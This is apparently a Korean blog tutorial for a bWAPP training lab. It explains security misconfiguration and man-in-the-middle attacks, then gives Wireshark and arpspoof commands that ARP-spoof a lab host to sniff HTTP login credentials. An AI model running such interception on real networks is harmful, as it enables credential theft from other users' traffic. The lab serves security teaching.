[Kali_Linux] Man-in-the-Middle Attack(HTTP) | bWAPP | Security Misconfiguration

본 내용은 교육 과정에서 필요한 실습 목적으로 구성된 것이며, 혹시라도 개인적인 용도 및 악의적인 목적으로 사용할 경우, 법적 책임은 본인에게 있다는 것을 알려드립니다.

1. Security Misconfiguration

  - 잘못된 보안 구성

  - 서버 / 시스템 / DB / 네트워크 장비 / 웹 설정 오류로 인하여 발생하는 취약점이다.

  - Ex) 디렉토링 리스팅, 에러페이지, 웹페이지 주석, 웹서버 기본 설정, Adobe Flash 취약점, Dos/DDos공격,

         특정 서비스에 대한 Reverse_TCP 공격, 로컬 권한 취약점, 백업 / 임시 / robots 파일

 

2. Man-in-the-Middle Attack

   - 중간에 공격자가 사용자 패킷을 훔쳐보거나 갈취하는 스니핑 공격이다.

   - Ex) ARP 스푸핑, DNS 스푸핑

 

3. Security Misconfiguration - Man-in-the-Middle Attack ( HTTP )

   - 이 시나리오는 ARP 스푸핑을 실시하여 HTTP 로그인 정보를 스니핑하는 내용이다.

 

========================실습==========================

1) 첫화면

 

2) 와이어샤크를 킵니다.

# wireshark &

 

3) 필터에다가 http해놓습니다.

 

4) arspoof 설치

   # sudo apt install dsniff

5) arpspoof 실행

   # sudo arpspoof -i eth0 -t 192.168.222.1 -r 192.168.222.132

 

6) 와이어샤크 캡쳐 내용 확인

 

7) ARP 스푸핑 중지는 Ctrl + C